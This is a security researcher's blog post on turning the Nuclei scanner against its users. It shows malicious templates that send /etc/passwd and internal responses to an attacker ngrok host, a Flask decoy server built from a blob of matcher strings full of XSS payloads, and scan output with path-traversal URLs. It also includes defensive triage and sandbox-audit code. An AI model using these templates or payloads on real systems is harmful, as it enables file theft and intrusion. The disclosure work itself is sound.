1632834092
Tired of kiddies messing with your servers? Tired of zillions of requests and tool-generated reports? FEAR NO MORE!
Ok, I'm kinda lazy to write lots of technical things and be funny, so this post is gonna be a dump. The tool is great btw, but it's fun to mess with great things I guess.
So @c3l3s14n made a malicious template that exploits an RCE in headless Chrome. Let's make more malicious templates!

    id: lfr-poc
    info:
      name: Local File Read on Nuclei with Exfiltration
      author: caioluders
      severity: critical
      description: You got it
    requests:
      - method: GET
        payloads:
          passwd: /etc/passwd
        path:
          - "https://133713371337.ngrok.io/{{passwd}}"

    id: ssrf-poc
    info:
      name: SSRF on Nuclei with Exfiltration
      author: caioluders
      severity: critical
      description: Makes internal request, dumps response on the attacker's server
    requests:
      - method: GET
        path:
          - "http://127.0.0.1:1337/flag"
          - "http://133713371337.ngrok.io/{{base64(output)}}"
        extractors:
          - type: regex
            name: output
            part: body
            internal: true
            regex:
              - ".*"

Is this a SERVER SIDE, or Client Side? Hacker Side? The question remains...
What if you made a server that responds with all the right answers and is vulnerable to everything?
With a little bit of Python you can extract all the matchers and JOIN THEM!
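
    import glob
    import os

    import yaml

    home_dir = os.path.expanduser('~')

    # Walk every template in the local nuclei-templates checkout
    all_templates = glob.iglob(home_dir + "/nuclei-templates/**/*.yaml", recursive=True)
    for f in all_templates:
        with open(f, "r") as fh:
            yaml_dump = yaml.safe_load(fh)  # safe_load: never build objects from template YAML
        try:
            # Join the "words" of the first matcher of the first request
            print(''.join(yaml_dump["requests"][0]["matchers"][0]["words"]), end="")
        except (KeyError, IndexError, TypeError):
            pass  # template has no requests/matchers/words in that position
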
type="text"
name="ContactId"</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>Nuclei:
CVE-2016-10960wp-login.php?checkemail=confirmapplication/json</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>text/htmlcf79ae6addba60ad018347359bd144d2</script><script>alert(document.domain)</script>httpPHP
Credits<script>alert('{{randstr}}')</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>http<script>confirm({{randstr}})</script>SIS-REWEhttpNetpDoDomainJoin:</script><script>alert(document.domain)</script>application/xml/Success.htm</script><script>alert(document.domain)</script>mec-eventstext/csvtext/plainWelcome
to your WordPress
DashboardcommandResultuid=http</script><script>alert(document.domain)</script>uid=gid=groups=http</script><script>alert(document.domain)</script>application/x-javascriptdef_wirelesspassword
=<title>Roteador
Wireless</title></script><script>alert(document.domain)</script>http<script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script></title><script>alert('{{randstr}}')</script>"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"The
attribute valuejava.lang.UNIXProcess@has invalid value!"status" :
"400"XMLHttpRequest.prototype.open<p:StdOut>uid=0(root) gid=0(root)
groups=0returntagjidsaltwheelvRealize Operations ManagerthumbprintaddresshttpApache Server
StatusServer
Versiontext/html<script>alert(document.domain);</script>/wp-content/themes/realestateuid=gid=groups=VoIPmonitor
installationapplication/jsonIndex of /cache/backupParent Directory.sql.gz<script
type="text/javascript">var d = new
Date();window.parent.$("#mobLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());window.parent.$("#tabLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());</script>{{randstr}}.tldEXPONENT.PATHEXPONENT.URL"zlo
onerror=alert(1) "Device Status
Graphhttponmouseover="alert('nuclei')root_causetruncatedreasonfor 16-bit app supportJH 404
LoggerMicrosoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundExceptionExchange MAPI/HTTP
Connectivity
Endpoint<SERIAL><VERSION>uidgidgroups</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>httpinput/Autofocus/%0D*/Onfocus=alert(123);goto-tour-list-js-extra<str
name="status">OK</str>alert(document.domain);"zlo onerror=alert(1) "Device Status
Graph{"result":{"isDisconnected":text/html"zlo onerror=alert(1) "Device Status
Graph</script><script>alert(document.domain)</script>text/htmlnucleiNo policy has been
chosen.</script><script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script>syslog:admin/etc_ro/lighttpd/wwwhttp709b38b27304df6257a86a60df742c4c><svg/onload=alert(1)><Calendar
DetailsPHP ExtensionPHP
Version"></script><script>alert(document.domain)</script>application/pdffilename="dompdf_out.pdf"DB_NAMEDB_PASSWORD</textarea></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>'></script><script>alert(document.domain)</script>please
input shell commandZTE Corporation. All rights
reservedapplication/json<script>alert(1)</script>DB_NAMEDB_PASSWORDDB_USERDB_HOST<userauth><password>Level
was:
LEVEL15/WEB_VMS/LEVEL15/https://weiphp.cnWeiPHPDB_PREFIX"username":"anonymous""Administrator""newPassword":""Application
ServerManagement
ConsoleserverIdentifiercompanyNamehadoopVersionresourceManagerVersionBuiltOnxdebug.remote_connect_back</td><td
class="v">On</td><td class="v">On</td>"id":"version":"method":"url":"time":<title>Database
Error</title>Request URI: /examples/jsp/snp/snoop.jsp<fieldset id="adminaccount"><legend>Create
an <strong>admin account</strong></legend><legend><a id="showAdvanced" tabindex="0"
href="#">Storage & databaseapplication/jsonUnfortunately the article you are looking for
could not be found.dns"took":TCP/IP Configuration<title>Network - Plastic
SCM</title>httppool:process manager:start
time:pid:{"runs":[{"id":resource_references<title>Alertmanager</title>var db =
'information_schema';var opendb_url = 'db_structure.php';Welcome to Zenphoto! This page will set
up ZenphotoTraffic and system resource graphingMultimon: UPS Status PageContexts known to this
server are:{"Uri":"/worker","Method":"GET"}Monitoring JavaMelody onRack
Environment"roles""permissions""role""kv"<ListBucketResult xmlns=# -FrontPage-<title>Solr admin
page</title>scalarsloading_mechanismcustom_scalars<title>ViewPoint System
Status</title>HTTP_ACCEPTHTTP_ACCEPT_ENCODINGnode_cooling_devicenode_networkvti_extenderversion:FPVersion=<HEAD><TITLE>Display
file upload form to the user</TITLE></HEAD>Druid Stat Index</title>Apache Server StatusServer
VersionkibanaWelcomeViewcluster_uuidkibanaWelcomeLogokibanaWelcomeTitleJSP ExamplesJSP
SamplesServlets ExamplesWebSocket Examples<title>Home - Mongo Express</title><title>system.users
- Mongo Express</title>"ParentId":"Container":"Labels":PRTG Traffic
Grapher"repoKey""repositories":applicationNameserviceTypeaura:invalidSessionWhoops! There was
an error<title>Warning [refreshed every 30 sec.]</title>Popup
Uploadpython_gc_objects_collected_totalpython_infoUser sign up completed
successfully<title>Android Debug Database</title>autodiscover.interact.sh<title>phpMyAdmin
setup</title><title>Horde :: User Administration</title><title>200 Purged</title>"status":
"ok"<title>Kafdrop: Broker List</title>Kafka Cluster Overviewhttplsmkdir chmod mv nano vim
pico sudo cd cp ps aux URLconf definedPage not foundDjango tried these URL patterns, in this
orderAPCu Version InformationGeneral Cache InformationDetailed Memory Usage and
FragmentationContent-Type: application/json<title>JK Status
Manager</title><title>SQLiteManager</title>Create dashboardZabbix SIAStatistics Report for
HAProxyHP<h1>SNMP</h1>"><svg onload=confirm(document.domain)>Suggestions for improving the
resultsX-Debug-Token-Link:/_profiler/can_execute_commands":"a.":"A.title="~system"NetWeaverapiVersionOverview
- Kubernetes Resource ReportnamespaceHELPTYPEkubeapplication/json<title>Snippets · Explore ·
GitLab</title><a data-qa-selector="register_link" href="/users/sign_up">Register
now</a>data-qa-selector="new_user_register_button"Set-Cookie: _gitlab_session=Content-Type:
text/html<h1> Ooops. </h1>Traceback (most recent call last)Nginx Vhost Traffic
StatusHostZoneActive connections:<H1>OK</H1><title>Groovy Console</title>Run ScriptGroovy
Web
ConsolebuildCountdownloadNameacHandling"status""diskSpace""jms"mappingsmethodproducesthreadNamethreadIdwaitedTimelockNamestackTracemethodName"loggers""levels""build""artifact""type""beans""dependencies""scope"positiveMatchesAuditAutoConfiguration#auditListenerEndpointAutoConfiguration#beansEndpointorg.springframework.boot.actuatebeanscontexts"threads":"threadName":applicationConfigactiveProfiles"timestamp""info""method""path"memmem.freeprocessorsinstance.uptimesystemload.averagenonheap.initheap.committed"traces""timestamp""principal""session"package=Administrators
name:Support Administrators email address:Web-FTPsquare loginX-Jenkins<title>Froxlor Server
Management Panel</title><title>IBM HTTP
Server</title>access_keyterraform<title>OneBlog开源博客后台管理系统</title><title>Payara
Server - Server Running</title><!-- Element where elFinder will be created (REQUIRED)
-->Nexus Repository Manager<title>Strapi Admin</title><title>OWASP Juice
Shop</title>GraylogREST API browserswagger<title>Elasticsearch-sql
client</title><title>Dotclear</title>defaultmy_idroot_url<title>Sage
X3</title><title>GlassFish Server - Server Running</title><title>Daybyday -
Login</title><title>Centreon - IT & Network Monitoring</title><title>Test Page for the
Apache HTTP Server on Red Hat Enterprise Linux</title><title>Operations Automation Default
Page</title><title>Powered by lighttpd</title>"_links":"self":"health"<TITLE>Powered By
Jetty</TITLE>gotmls<title>Home Assistant</title><title>Test Page for the HTTP Server on
Fedora</title><TITLE>Olivetti CRF</TITLE><title>TurnKey NGINX PHP FastCGI
Server</title><title>Webmodule</title><title>SeedDMS: Sign in</title>urlArgs : "v=Sign in to
OpenAMForgeRockforgerockFRForgotUsernamesuccessfulUserRegistrationDestination"id":"wazuh""title":"Wazuh""icon":"plugins/wazuh/img/icon_blue.png""url":"/app/wazuh"var
nc_lastLogin<title>PHP-Proxy</title><title>Node-RED</title><a href="http://moinmo.in/"
title="This site uses the MoinMoin Wiki software.">MoinMoin Powered</a><a
href="http://moinmo.in/Python" title="MoinMoin is written in Python.">Python
Powered</a><a><b>XXL</b>JOB</a><title>AContent : Home</title>AContent - Copyright 2010 by
IDRC/IDI http://inclusivedesign.ca/<title>BookStack</title><span
class="logo-text">BookStack</span>Welcome to the Artica Web Administration Interface: Web
Accessibility Checker</title>AChecker - Copyrightoctober_session<title>Mautic</title><div
class="mautic-logoPowered by WonderCMShttps://www.wondercms.comrx_sesskey1Powered by
Gitea<title>YApi-高效、易用、功能强大的可视化接口管理平台</title><meta name="generator"
content="Plone - <div
xmlns:css="http://namespaces.plone.org/diazo/css"/++plone++static/plone-compiled.css/++plone++static/tinymce-styles.css>Powered
by Plone & Python</a>javax.faces.resourcejavax.faces.ViewState<title>Burp
API</title>Home Page - My ASP.NET Application<title>Ticket BBCode editor -
SCEditor</title>title="SCEditor"<title>Web Server's Default
Page</title><title>PhpCollab</title>Homepage | Gila CMS<meta name="generator" content="Gila
CMS">Powered by wuzhicms<h1>Interactive Console</h1>X-Powered-By: Craft CMS<title>openSIS
Student Information System</title><title>Authenticate Please!</title><form
action="/bolt/login"<img class="logo" alt="Bolt CMS logo"<img
src="/app/view/img/bolt-logo.png"<link rel="shortcut icon"
href="/app/view/img/favicon-bolt.ico"><link rel="stylesheet"
href="/app/view/css/bolt-old-ie.css"<link rel="stylesheet"
href="/app/view/css/bolt.css"<script src="/app/view/js/bolt.js"></script><script
src="/app/view/js/bolt.min.js"<script src="/assets/bolt.js"></script>Bolt requires
JavaScript to function properly and continuing without it might corrupt or erase data.Bolt »
LoginCookies are required to log on to Bolt. Please allow
cookies.<title>BigBlueButton</title><title>Harbor</title>iPlanet<title>json-web-services-api</title>There
are no services matching that phrase.Unable to deserialize
objectWebLogic<title>Opencast</title>name="application-name" content="Jellyfin"class="page
homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs"The Free
Software Media System<title>CrushFTP WebInterface</title><title>- AvantFAX -
Login</title><title>Jitsi Meet</title>Welcome to the BIG-IPConfiguration
Utility<title>Kibana</title>kibanaLoaderWrapkibanaLoaderxpackElasticsearch B.V<title>Rapid
web development with Lucee!</title><title>Jeedom</title><title>HTTP Server Test Page powered
by CentOS-WebPanel.com</title><title> eG Innovations, Inc.</title>eG Innovations, Inc. All
Rights ReservedPCoIP Connection Manager<title>druid monitor</title><title>Welcome to
OpenResty!</title><TITLE>Test Page for the SSL/TLS-aware Apache Installation on Web
Site</TITLE>rememberMe=deleteMe<title>HP BladeSystem Onboard
Administrator</title>Set-Cookie: grav-site-<title>iTop
login</title>"timestamp":"protocol":"agent":Realisiert mit ShopwareRealised with
ShopwareShopware Administration (c) shopware AG<title>Shopware 5 - Backend (c) shopware
AG</title>-Confluence--confluence-Welcome to Abyss Web Servermagmi_multifield"description"
:"The Pega APIX-Powered-By: ThinkCMFThis is a SOCKS
ProxyHTTPTunnelPortSOCKSPortversion.services.core.carbon.wso2.org<title>Hello! Welcome to
Synology Web Station!</title><li><a
href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic
Beanstalk overview</a></li><li><a
href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk
overview</a></li>TIBCO Jaspersoft: LoginCould not login to JasperReports ServerAbout TIBCO
JasperReports Server<title>Login utilisateur Gespage</title><title>InfluxDB - Admin
Interface</title><title>The install worked successfully!
Congratulations!</title>CFG_GLPI_glpi_csrf_tokenGLPI CopyrightREDCapVanderbilt
UniversityThis error page was generated by SAP Web DispatcherBasic realm="WEB ADMIN"SAP
NetWeaver Application Serversap-system-login<title>Logon</title>SAP IGSis runningKubernetes
Enterprise ManagergitVersiongoVersionplatformMirantis Kubernetes EngineReport
Manager<title>Microsoft Azure App Service - Welcome</title><title>IIS Windows
Server</title><title>IIS7</title><title>Welcome to nginx!</title><title>Test Page for the
Nginx HTTP Server on Amazon Linux</title>RadAsyncUpload handler is registered
succesfullyOracle iPlanet Web Server<TITLE>Oracle Application Server Containers for J2EE
10g</TITLE><title>Oracle HTTP Server 12c</title><title>Oracle Database as a
Service</title><title>DBaaS Monitor</title>Could not parse auth
tokenx-goog-metagenerationX-Goog-MetagenerationValidateWelcomeAxisdeployedinstallationAdmin<title>Apache
TomcatApache TomcatApache Guacamole<title>Welcome to XAMPP</title>Airflow 404 = lots of
circles<title>Apache HTTP Server Test Page powered by CentOS</title><title>Apache2 Ubuntu
Default Page: It works</title><title>Apache2 Debian Default Page: It works</title>ColdFusion
documentation
(bit of overkill, I know)
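Example of a false-positive server:
# coding: utf-8
from flask import Flask

app = Flask(__name__, template_folder='.')

# Paste the joined matcher string produced by the script above.
BAD_NUCLEI_STRING_FROM_ABOVE = "..."

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    # Every path returns the same body, so every word matcher finds its string.
    return BAD_NUCLEI_STRING_FROM_ABOVE

if __name__ == "__main__":
    # debug=True would expose the Werkzeug debugger on every interface.
    app.run(host='0.0.0.0', debug=False)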
$ nuclei -u http://192.168.0.6:5000/
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.5.2

        projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.5.2 (latest)
[INF] Using Nuclei Templates 8.5.4 (latest)
[INF] Using Interactsh Server https://interact.sh
[INF] Templates added in last update: 117
[INF] Templates loaded for scan: 2026
[INF] Templates clustered: 316 (Reduced 292 HTTP Requests)
[2021-09-28 09:04:37] [zhiyuan-file-upload] [http] [critical] http://192.168.0.6:5000/seeyon/thirdpartyController.do.css/..;/ajax.do
[2021-09-28 09:04:37] [tictail-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [github-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [addeventlistener-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kinsta-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-mirantis] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [ambari-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-dashboard] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-asp.net-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [pingdom-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [shopify-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [jazzhr-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
[2021-09-28 09:04:37] [symantec-epm-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [druid-console-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [hatenablog-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [epmp-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [bigbluebutton-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wondercms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-assetexplorer] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [owncloud-config] [http] [info] http://192.168.0.6:5000/owncloud/config/
[2021-09-28 09:04:37] [oracle-http-server-12c] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [lucee-stack-trace] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [worksites-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-microsoft-azure-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wishpond-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [iplanet-web-server] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-supportcenter] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-opmanager] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [rocketmq-console-exposure] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [flink-exposure] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wuzhicms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [android-debug-database-exposed] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [olivetti-crf-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [yapi-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [freshdesk-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [aws-bucket-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [simplebooklet-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kafka-monitoring] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-nginx-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [mashery-takeover] [http] [high] http://192.168.0.6:5000/
...
This continues for 800 lines ...
...
You can also do a Reverse Nuclei Proxy that identifies the incoming Nuclei request and outputs the expected template matcher. I started coding this, but the demonic string above is cooler and easier.
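For whoever has to read a report like the one above, a triage pass can flag hosts whose findings contradict each other before they reach a ticket queue. This is an added example, not code from the original post or from Nuclei; the thresholds, the function names and the second host 10.0.0.7 are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: finding lines copied from the scan output above,
# plus one made-up ordinary host (10.0.0.7) for contrast.
SAMPLE = """\
[INF] Templates loaded for scan: 2026
[2021-09-28 09:04:37] [tictail-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [github-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kinsta-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-asp.net-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
[2021-09-28 09:04:37] [kubernetes-dashboard] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [druid-console-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [shopify-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-nginx-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:05:02] [default-nginx-page] [http] [info] http://10.0.0.7/
"""

# [timestamp] [template-id] [protocol] [severity] URL
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<template>[^\]]+)\] \[(?P<proto>[^\]]+)\] "
    r"\[(?P<severity>[^\]]+)\] (?P<url>\S+)"
)


def parse_findings(text):
    """Yield (host, template_id, severity); banner and [INF]/[WRN] lines do not match."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield urlsplit(m["url"]).netloc, m["template"], m["severity"]


def triage(text, max_templates=50, max_takeovers=1):
    """Return {host: details} for hosts whose results look like a match-everything server."""
    templates = defaultdict(set)
    for host, template, _severity in parse_findings(text):
        templates[host].add(template)  # a set, so repeated hits of one template count once

    report = {}
    for host, ids in templates.items():
        takeovers = sorted(t for t in ids if t.endswith("-takeover"))
        reasons = []
        # Heuristic: one response is rarely the error page of several providers at once.
        if len(takeovers) > max_takeovers:
            reasons.append("%d takeover templates matched one host" % len(takeovers))
        # Heuristic: a single host matching a large share of the template set.
        if len(ids) > max_templates:
            reasons.append("%d distinct templates matched" % len(ids))
        if reasons:
            report[host] = {"templates": len(ids), "takeovers": takeovers,
                            "reasons": reasons}
    return report


if __name__ == "__main__":
    for host, info in triage(SAMPLE).items():
        print(host, info["reasons"])
```

Hosts returned by `triage` are candidates for manual review; the 800-line result set above would trip both rules at the default thresholds.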
As seen above, the Headless Chrome of Nuclei runs WITHOUT the Sandbox.
previouspids := findChromeProcesses()
chromeLauncher := launcher.New().
    Leakless(false).
    Set("disable-gpu", "true").
    Set("ignore-certificate-errors", "true").
    Set("ignore-certificate-errors", "1").
    Set("disable-crash-reporter", "true").
    Set("disable-notifications", "true").
    Set("hide-scrollbars", "true").
    Set("window-size", fmt.Sprintf("%d,%d", 1080, 1920)).
    Set("no-sandbox", "true").
    Set("mute-audio", "true").
    Set("incognito", "true").
    Delete("use-mock-keychain").
    UserDataDir(dataStore)
So every Chrome 1-day becomes an RCE on Nuclei. Don't ever run -headless, I guess.
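To check whether a scanning box currently has an unsandboxed browser running, the process list can be audited for the flag set by the launcher call above. This is an added example, not code from the post or from Nuclei; it assumes Linux `/proc`, assumes the launcher renders `Set("no-sandbox", "true")` as `--no-sandbox=true`, and the binary names and sample command lines are constructed.

```python
import os

# Assumed basenames of Chromium-family binaries; extend for your environment.
CHROMIUM_NAMES = {"chrome", "chromium", "chromium-browser",
                  "google-chrome", "headless_shell"}

# Constructed samples of /proc/<pid>/cmdline content (NUL-separated argv).
LAUNCHED = b"/usr/bin/chromium\0--headless\0--no-sandbox=true\0--mute-audio=true\0"
SANDBOXED = b"/usr/bin/chromium\0--headless\0--mute-audio=true\0"
OTHER_TOOL = b"/usr/bin/python3\0scan.py\0--no-sandbox\0"
# Constructed case of a process title rewritten into one space-joined string.
RETITLED = b"/opt/chrome/chrome --type=renderer --no-sandbox --lang=en\0"


def parse_cmdline(raw):
    """Split raw cmdline bytes into argv, coping with space-joined process titles."""
    argv = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
    if len(argv) == 1 and " --" in argv[0]:
        argv = argv[0].split()
    return argv


def sandbox_disabled(argv):
    """True if argv is a Chromium-family process started with the no-sandbox switch."""
    if not argv or os.path.basename(argv[0]) not in CHROMIUM_NAMES:
        return False
    # Compare the switch name only, so "--no-sandbox=true" is caught as well.
    # Flagged on presence whatever the value (assumption: the browser only
    # checks that the switch is there).
    return any(arg.split("=", 1)[0] == "--no-sandbox" for arg in argv[1:])


def scan_proc(proc="/proc"):
    """Return [(pid, binary)] for unsandboxed Chromium processes under proc."""
    hits = []
    for pid in sorted(filter(str.isdigit, os.listdir(proc)), key=int):
        try:
            with open(os.path.join(proc, pid, "cmdline"), "rb") as fh:
                argv = parse_cmdline(fh.read())
        except OSError:
            continue  # process exited or is not readable by this user
        if sandbox_disabled(argv):
            hits.append((int(pid), argv[0]))
    return hits


if __name__ == "__main__":
    for pid, binary in scan_proc():
        print("unsandboxed browser: pid=%d %s" % (pid, binary))
```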
( ´ ▽ ` )/
by @caioluders